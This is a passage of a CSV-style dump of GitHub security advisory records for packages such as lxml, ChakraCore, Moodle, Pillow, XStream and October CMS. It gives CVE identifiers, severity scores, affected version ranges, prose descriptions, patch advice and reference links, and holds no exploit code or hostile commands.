`lxml` clean module versions before 4.6.3. When disabling `the safe_attrs_only` and `forms` arguments, the `Cleaner` class does not remove the `formaction` attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. This issue is patched in `lxml` 4.6.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'lxml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28957'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/pull/316'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/pull/316/commits/10ec1b4e9f93713513a3264ed6158af22492f270'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/2d01a1ba8984e0483ce6619b972832377f208a0d'}, {'type': 'WEB', 'url': 'https://github.com/lxml/lxml/commit/a5f9cb52079dc57477c460dbe6ba0f775e14a999'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/lxml/+bug/1888153'}, {'type': 'PACKAGE', 'url': 'https://github.com/lxml/lxml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00031.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3C2R44VDUY7FJVMAVRZ2WY7XYL4SVN45/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXN3QPWCTQVOGW4BMWV3AUUZZ4NRZNSQ/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/lxml'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-06'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210521-0004/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4880'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T16:52:59Z', 'nvd_published_at': '2021-03-21T05:15:00Z'}" +1.4.0,GHSA-w89r-qch4-8jv5,2021-03-18T21:22:56Z,2021-03-29T20:59:59Z,,['CVE-2019-0912'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0912'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/936a5af1c07e0fdec9aab85c05339dabe4aaeeb1'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0912'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:22:56Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-7h8v-2v8x-h264,2021-03-24T23:17:53Z,2021-03-29T20:42:19Z,,['CVE-2020-25700'],SQL Injection in moodle,"In moodle, some database module web services allowed students to add entries within groups they did not belong to. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5, 3.7 to 3.7.8, 3.5 to 3.5.14 and earlier unsupported versions. This is fixed in moodle 3.8.6, 3.7.9, 3.5.15, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '3.5.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25700'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/8169aeff59d8ed910ca3545413561005282bbd32'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895427'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413938'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:17:53Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}" +1.4.0,GHSA-p75f-g7gx-2r7p,2022-06-06T18:11:44Z,2021-03-08T20:38:35Z,,['CVE-2021-21336'],Exposure of Sensitive Information to an Unauthorized Actor in Products.PluggableAuthService ZODBRoleManager,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +Information disclosure vulnerability - everyone can list the names of roles defined in the ZODB Role Manager plugin if the site uses this plugin. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +The problem has been fixed in version 2.6.0. Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to 2.6.0 and re-run the buildout, or if you used pip simply do `pip install ""Products.PluggableAuthService>=2.6.0""` + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +There is no workaround. Users are encouraged to upgrade. + +### References +_Are there any links users can visit to find out more?_ + +- [GHSA-p75f-g7gx-2r7p](https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p75f-g7gx-2r7p) +- [Products.PluggableAuthService on PyPI](https://github.com/zopefoundation/Products.PluggableAuthService) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Products.PluggableAuthService issue tracker](https://github.com/zopefoundation/Products.PluggableAuthService/issues) +* Email us at [security@plone.org](mailto:security@plone.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p75f-g7gx-2r7p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21336'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/commit/2dad81128250cb2e5d950cddc9d3c0314a80b4bb'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.PluggableAuthService/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T20:38:23Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}" +1.4.0,GHSA-qc65-cgvr-93p6,2022-07-05T18:01:04Z,2021-03-19T21:19:18Z,,['CVE-2021-23356'],Code injection in kill-process-by-name,"This affects all versions of package kill-process-by-name. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-process-by-name'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23356'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLPROCESSBYNAME-1078534'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T22:24:54Z', 'nvd_published_at': '2021-03-15T17:15:00Z'}" +1.4.0,GHSA-v89p-5hr2-4rh4,2021-03-22T23:16:52Z,2021-03-29T20:56:15Z,,['CVE-2019-1197'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1140, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1197'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/bf52b6cfa96d6395046d0aaf87396cd7ca13f6cb'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1197'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:16:52Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}" +1.4.0,GHSA-f4w8-cv6p-x6r5,2023-09-04T16:25:47Z,2021-03-18T19:55:13Z,,['CVE-2021-27921'],Pillow Denial of Service by Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for a BLP container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27921'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:35:22Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}" +1.4.0,GHSA-52mq-6jcv-j79x,2021-04-14T19:07:25Z,2021-03-03T02:23:56Z,,['CVE-2021-21320'],User content sandbox can be confused into opening arbitrary documents,"### Impact + +The user content sandbox can be abused to trick users into opening unexpected documents after several user interactions. The content can be opened with a `blob` origin from the Matrix client, so it is possible for a malicious document to access user messages and secrets. + +### Patches + +This has been fixed by https://github.com/matrix-org/matrix-react-sdk/pull/5657, which is included in 3.15.0. + +### Workarounds + +There are no known workarounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-52mq-6jcv-j79x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21320'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/pull/5657'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/commit/b386f0c73b95ecbb6ea7f8f79c6ff5171a8dedd1'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/matrix-react-sdk'}]","{'cwe_ids': ['CWE-345'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T02:47:04Z', 'nvd_published_at': '2021-03-02T03:15:00Z'}" +1.4.0,GHSA-56p8-3fh9-4cvq,2022-02-08T21:32:10Z,2021-03-22T23:29:09Z,,['CVE-2021-21348'],XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos),"### Impact +The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21348](https://x-stream.github.io/CVE-2021-21348.html). + +### Credits +The vulnerability was discovered and reported by threedr3am. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-56p8-3fh9-4cvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21348'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21348.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-400', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:25:49Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-xhfx-hgmf-v6vp,2021-03-10T21:07:08Z,2021-03-10T21:07:25Z,,['CVE-2021-21265'],Potential Host Header Poisoning on misconfigured servers,"### Impact +When running on servers that are configured to accept a wildcard as a hostname (i.e. the server routes any request, regardless of the HOST header to an October CMS instance) the potential exists for Host Header Poisoning attacks to succeed. See the following resources for more information on Host Header Poisoning: +- https://portswigger.net/web-security/host-header +- https://dzone.com/articles/what-is-a-host-header-attack + +### Patches + +A feature has been added in v1.1.2 to allow a set of trusted hosts to be specified in the application. + +### Workarounds + +- Apply https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6 & https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0 to your installation manually if unable to upgrade to v1.1.2. + +- Check that the configuration setting `cms.linkPolicy` is set to `force`. + +### Alternative Workaround + +Check to make sure that your web server does not accept any hostname when serving your web application. + +1. Add an entry called `testing.tld` to your computer's host file and direct it to your server's IP address +2. Open the address `testing.tld` in your web browser +3. Make sure an October CMS website is not available at this address + +If an October CMS website is returned, configure your webserver to only allow known hostnames. If you require assistance with this, please contact your server administrator. + +### References + +Reported by [Abdullah Hussam](https://github.com/ahussam) + +### For More Information + +If you have any questions or comments about this advisory: +* Email us at [hello@octobercms.com](mailto:hello@octobercms.com) + +### Threat Assessment +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-xhfx-hgmf-v6vp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21265'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/library/commit/f86fcbcd066d6f8b939e8fe897409d152b11c3c6'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/f638d3f78cfe91d7f6658820f9d5e424306a3db0'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/october/backend'}]","{'cwe_ids': ['CWE-644'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T21:07:08Z', 'nvd_published_at': '2021-03-10T22:15:00Z'}" +1.4.0,GHSA-8mrf-64fw-2x75,2021-03-25T21:05:18Z,2021-03-25T21:06:41Z,,['CVE-2020-8298'],Command injection in fs-path,"fs-path node module before 0.0.25 is vulnerable to command injection by way of user-supplied inputs via the `copy`, `copySync`, `remove`, and `removeSync` methods.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fs-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8298'}, {'type': 'WEB', 'url': 'https://github.com/pillys/fs-path/pull/6'}, {'type': 'WEB', 'url': 'https://github.com/pillys/fs-path/commit/88ff5ee51046bb2c5d5e9c5afe6819b032092ce7'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/324491'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-25T21:05:18Z', 'nvd_published_at': '2021-03-04T20:15:00Z'}" +1.4.0,GHSA-rh4p-g7x6-8pqg,2021-03-18T22:33:32Z,2021-03-29T20:59:09Z,,['CVE-2019-1062'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1092, CVE-2019-1103, CVE-2019-1106, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1062'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1062'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:33:32Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}" +1.4.0,GHSA-fvcj-hvfw-7f2v,2022-07-05T17:37:33Z,2021-03-08T15:49:53Z,,['CVE-2021-1725'],Improper Authentication,"### Impact +A maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot. + +### Patches +The problem has been patched in all affected versions. Please see the list of patched versions for the most appropriate one for your individual case. + +### Workarounds +Users who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if the Claims are Skill Claims. + +For detailed instructions, see the link in the References section. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botbuilder-dotnet) +* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.7.0'}, {'fixed': '4.7.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.8.0'}, {'fixed': '4.8.1'}]}], 'versions': ['4.8.0']}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.9.0'}, {'fixed': '4.9.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'botframework-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.10.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/botbuilder-js/security/advisories/GHSA-fvcj-hvfw-7f2v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-1725'}, {'type': 'WEB', 'url': 'https://aka.ms/SkillClaimsValidationJavascript'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/botframework-connector'}]","{'cwe_ids': ['CWE-200', 'CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T15:47:09Z', 'nvd_published_at': '2021-01-12T20:15:00Z'}" +1.4.0,GHSA-hrmm-f4j8-8vxc,2021-03-18T21:56:56Z,2021-03-29T21:00:11Z,,['CVE-2019-0922'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0922'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a9ab1aae31078e80593b9227db11d316c2239ef3'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0922'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:56:56Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-g2fg-mr77-6vrm,2022-02-08T21:37:21Z,2021-03-12T21:33:55Z,,['CVE-2020-13949'],Uncontrolled Resource Consumption in Apache Thrift,"In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.thrift:libthrift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.3'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13949'}, {'type': 'WEB', 'url': 'https://github.com/apache/hbase/pull/2958'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/hbase'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r01b34416677f1ba869525e1b891ac66fa6f88c024ee4d7cdea6b456b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02ba8db500d15a5949e9a7742815438002ba1cf1b361bdda52ed40ca@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02f7771863383ae993eb83cdfb70c3cb65a355c913242c850f61f1b8@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0372f0af2dad0b76fbd7a6cfdaad29d50384ad48dda475a5026ff9a3@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08a7bd19470ef8950d58cc9d9e7b02bc69c43f56c601989a7729cce5@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1084a911dff90b2733b442ee0f5929d19b168035d447f2d25f534fe4@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r117d5d2b08d505b69558a2a31b0a1cf8990cd0385060b147e70e76a9@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r12090c81b67d21a814de6cf54428934a5e5613fde222759bbb05e99b@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r13f40151513ff095a44a86556c65597a7e55c00f5e19764a05530266@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r143ca388b0c83fe659db14be76889d50b453b0ee06f423181f736933@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 